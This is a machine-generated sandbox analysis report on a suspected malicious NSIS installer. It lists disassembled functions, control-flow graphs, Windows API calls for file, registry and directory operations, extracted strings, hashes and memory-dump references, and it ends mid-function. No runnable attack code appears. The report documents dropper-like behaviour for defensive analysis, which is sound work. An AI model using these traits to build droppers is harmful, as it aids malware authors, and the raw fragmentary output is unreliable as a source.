                          • Opcode Fuzzy Hash: 7591e99d3b1f4cc40b45e62746b81664c4dcf89d43ee78bcadefa554f4fd18e3
                          • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D
                          Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 187 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 190 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 187->190 191 402e0a-402e0f 187->191 199 402f32-402f40 call 402d18 190->199 200 402e48-402e5f 190->200 192 403059-40305d 191->192 207 403011-403016 199->207 208 402f46-402f49 199->208 202 402e61 200->202 203 402e63-402e70 call 4032f7 200->203 202->203 209 402e76-402e7c 203->209 210 402fcd-402fd5 call 402d18 203->210 207->192 211 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 208->211 212 402f4b-402f63 call 40330d call 4032f7 208->212 213 402efc-402f00 209->213 214 402e7e-402e96 call 405b0f 209->214 210->207 238 402fc3-402fc8 211->238 239 402fd7-403007 call 40330d call 403060 211->239 212->207 235 402f69-402f6f 212->235 218 402f02-402f08 call 402d18 213->218 219 402f09-402f0f 213->219 214->219 233 402e98-402e9f 214->233 218->219 225 402f11-402f1f call 406300 219->225 226 402f22-402f2c 219->226 225->226 226->199 226->200 233->219 237 402ea1-402ea8 233->237 235->207 235->211 237->219 240 402eaa-402eb1 237->240 238->192 247 40300c-40300f 239->247 240->219 242 402eb3-402eba 240->242 242->219 244 402ebc-402edc 242->244 244->207 246 402ee2-402ee6 244->246 249 402ee8-402eec 246->249 250 402eee-402ef6 246->250 247->207 248 403018-403029 247->248 251 403031-403036 248->251 252 40302b 248->252 249->199 249->250 250->219 253 402ef8-402efa 250->253 254 403037-40303d 251->254 252->251 253->219 254->254 255 40303f-403057 call 405b0f 254->255 255->192
                          APIs
                          • GetTickCount.KERNEL32 ref: 00402DCE
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,00000400), ref: 00402DEA
                            • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405B58
                            • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00402E33
                          • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WEAREX_IHRACAT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                          • API String ID: 2803837635-745245828
                          • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                          • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                          • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                          • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
                          Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 384 401752-401777 call 402b38 call 4059aa 389 401781-401793 call 405ee8 call 405933 lstrcatW 384->389 390 401779-40177f call 405ee8 384->390 395 401798-401799 call 40617c 389->395 390->395 399 40179e-4017a2 395->399 400 4017a4-4017ae call 40622b 399->400 401 4017d5-4017d8 399->401 408 4017c0-4017d2 400->408 409 4017b0-4017be CompareFileTime 400->409 402 4017e0-4017fc call 405b54 401->402 403 4017da-4017db call 405b2f 401->403 411 401870-401899 call 405192 call 403060 402->411 412 4017fe-401801 402->412 403->402 408->401 409->408 424 4018a1-4018ad SetFileTime 411->424 425 40189b-40189f 411->425 413 401852-40185c call 405192 412->413 414 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 412->414 426 401865-40186b 413->426 414->399 446 401847-401848 414->446 428 4018b3-4018be CloseHandle 424->428 425->424 425->428 429 4029ce 426->429 433 4018c4-4018c7 428->433 434 4029c5-4029c8 428->434 432 4029d0-4029d4 429->432 436 4018c9-4018da call 405f0a lstrcatW 433->436 437 4018dc-4018df call 405f0a 433->437 434->429 443 4018e4-402241 call 4056c4 436->443 437->443 443->432 446->426 448 40184a-40184b 446->448 448->413
                          APIs
                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\gangningerne\jot\mtn\Discomplexion,?,?,00000031), ref: 00401793
                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\gangningerne\jot\mtn\Discomplexion,?,?,00000031), ref: 004017B8
                            • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                            • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                            • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp$C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll$C:\Users\user\gangningerne\jot\mtn\Discomplexion$Call
                          • API String ID: 1941528284-2454824246
                          • Opcode ID: 51c9294618428d1c231ec5d2af51adaaf8ce500cb0363ef0aa9a66f567df1bc9
                          • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                          • Opcode Fuzzy Hash: 51c9294618428d1c231ec5d2af51adaaf8ce500cb0363ef0aa9a66f567df1bc9
                          • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E
                          Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 450 402571-402586 call 402b1b 453 4029c5-4029c8 450->453 454 40258c-402593 450->454 455 4029ce-4029d4 453->455 456 402595 454->456 457 402598-40259b 454->457 456->457 459 4025a1-4025b0 call 405e48 457->459 460 4026e4-4026ec 457->460 459->460 463 4025b6 459->463 460->453 464 4025bc-4025c0 463->464 465 402655-402665 call 405bd7 464->465 466 4025c6-4025e1 ReadFile 464->466 465->460 471 402667 465->471 466->460 468 4025e7-4025ec 466->468 468->460 470 4025f2-402600 468->470 472 4026a0-4026ac call 405e2f 470->472 473 402606-402618 MultiByteToWideChar 470->473 474 40266a-40266d 471->474 472->455 473->471 476 40261a-40261d 473->476 474->472 477 40266f-402674 474->477 479 40261f-40262a 476->479 481 4026b1-4026b5 477->481 482 402676-40267b 477->482 479->474 480 40262c-402651 SetFilePointer MultiByteToWideChar 479->480 480->479 485 402653 480->485 483 4026d2-4026de SetFilePointer 481->483 484 4026b7-4026bb 481->484 482->481 486 40267d-402690 482->486 483->460 487 4026c3-4026d0 484->487 488 4026bd-4026c1 484->488 485->471 486->460 489 402692-402698 486->489 487->460 488->483 488->487 489->464 490 40269e 489->490 490->460
                          APIs
                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025D9
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                            • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                          • String ID: 9
                          • API String ID: 1149667376-2366072709
                          • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                          • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                          • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                          • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                          Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 491 40317b-4031a4 GetTickCount 492 4032e5-4032ed call 402d18 491->492 493 4031aa-4031d5 call 40330d SetFilePointer 491->493 498 4032ef-4032f4 492->498 499 4031da-4031ec 493->499 500 4031f0-4031fe call 4032f7 499->500 501 4031ee 499->501 504 403204-403210 500->504 505 4032d7-4032da 500->505 501->500 506 403216-40321c 504->506 505->498 507 403247-403263 call 40638e 506->507 508 40321e-403224 506->508 514 4032e0 507->514 515 403265-40326d 507->515 508->507 509 403226-403246 call 402d18 508->509 509->507 516 4032e2-4032e3 514->516 517 4032a1-4032a7 515->517 518 40326f-403285 WriteFile 515->518 516->498 517->514 519 4032a9-4032ab 517->519 520 403287-40328b 518->520 521 4032dc-4032de 518->521 519->514 522 4032ad-4032c0 519->522 520->521 523 40328d-403299 520->523 521->516 522->499 525 4032c6-4032d5 SetFilePointer 522->525 523->506 524 40329f 523->524 524->522 525->492
                          APIs
                          • GetTickCount.KERNEL32 ref: 00403190
                            • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                          • WriteFile.KERNELBASE(0040BE78,00411095,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                          • SetFilePointer.KERNELBASE(00005C4A,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$Pointer$CountTickWrite
                          • String ID: x>A
                          • API String ID: 2146148272-3854404225
                          • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                          • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                          • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                          • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED
                          Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 526 40232f-402375 call 402c2d call 402b38 * 2 RegCreateKeyExW 533 4029c5-4029d4 526->533 534 40237b-402383 526->534 536 402385-402392 call 402b38 lstrlenW 534->536 537 402396-402399 534->537 536->537 540 4023a9-4023ac 537->540 541 40239b-4023a8 call 402b1b 537->541 542 4023bd-4023d1 RegSetValueExW 540->542 543 4023ae-4023b8 call 403060 540->543 541->540 547 4023d3 542->547 548 4023d6-4024b0 RegCloseKey 542->548 543->542 547->548 548->533 551 402791-402798 548->551 551->533
                          APIs
                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CloseCreateValuelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp
                          • API String ID: 1356686001-1202048815
                          • Opcode ID: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
                          • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                          • Opcode Fuzzy Hash: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
                          • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
                          Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 552 4015b9-4015cd call 402b38 call 4059de 557 401614-401617 552->557 558 4015cf-4015eb call 405960 CreateDirectoryW 552->558 560 401646-402195 call 401423 557->560 561 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 557->561 565 40160a-401612 558->565 566 4015ed-4015f8 GetLastError 558->566 573 4029c5-4029d4 560->573 561->573 575 40163e-401641 561->575 565->557 565->558 569 401607 566->569 570 4015fa-401605 GetFileAttributesW 566->570 569->565 570->565 570->569 575->573
                          APIs
                            • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,752C2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 004059EC
                            • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                            • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                          • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\gangningerne\jot\mtn\Discomplexion,?,00000000,000000F0), ref: 00401630
                          Strings
                          • C:\Users\user\gangningerne\jot\mtn\Discomplexion, xrefs: 00401623
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                          • String ID: C:\Users\user\gangningerne\jot\mtn\Discomplexion
                          • API String ID: 3751793516-462110826
                          • Opcode ID: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                          • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                          • Opcode Fuzzy Hash: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
                          • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E
                          Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 578 402b78-402ba1 RegOpenKeyExW 579 402ba3-402bae 578->579 580 402c0c-402c10 578->580 581 402bc9-402bd9 RegEnumKeyW 579->581 582 402bb0-402bb3 581->582 583 402bdb-402bed RegCloseKey call 406252 581->583 584 402c00-402c03 RegCloseKey 582->584 585 402bb5-402bc7 call 402b78 582->585 591 402c13-402c19 583->591 592 402bef-402bfe 583->592 587 402c09-402c0b 584->587 585->581 585->583 587->580 591->587 593 402c1b-402c29 RegDeleteKeyW 591->593 592->580 593->587 595 402c2b 593->595 595->580
                          APIs
                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                          • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                          • RegCloseKey.ADVAPI32(?), ref: 00402C03
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          • Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                          • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                          • Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                          • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
                          Function 10001771 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 596 10001771-100017ad call 10001b3e 600 100017b3-100017b7 596->600 601 100018be-100018c0 596->601 602 100017c0-100017cd call 100022eb 600->602 603 100017b9-100017bf call 100022a1 600->603 608 100017fd-10001804 602->608 609 100017cf-100017d4 602->609 603->602 610 10001824-10001828 608->610 611 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 608->611 612 100017d6-100017d7 609->612 613 100017ef-100017f2 609->613 618 10001866-1000186c call 1000248d 610->618 619 1000182a-10001864 call 100015cc call 1000248d 610->619 635 1000186d-10001871 611->635 616 100017d9-100017da 612->616 617 100017df-100017e0 call 10002870 612->617 613->608 614 100017f4-100017f5 call 10002b2b 613->614 628 100017fa 614->628 623 100017e7-100017ed call 10002614 616->623 624 100017dc-100017dd 616->624 631 100017e5 617->631 618->635 619->635 634 100017fc 623->634 624->608 624->617 628->634 631->628 634->608 639 10001873-10001881 call 10002450 635->639 640 100018ae-100018b5 635->640 646 10001883-10001886 639->646 647 10001899-100018a0 639->647 640->601 642 100018b7-100018b8 GlobalFree 640->642 642->601 646->647 648 10001888-10001890 646->648 647->640 649 100018a2-100018ad call 10001555 647->649 648->647 650 10001892-10001893 FreeLibrary 648->650 649->640 650->647
                          APIs
                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                            • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                          • GlobalFree.KERNEL32(00000000), ref: 1000181C
                          • FreeLibrary.KERNEL32(?), ref: 10001893
                          • GlobalFree.KERNEL32(00000000), ref: 100018B8
                            • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,004050A3), ref: 100022D3
                            • Part of subcall function 10002614: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 10002686
                            • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
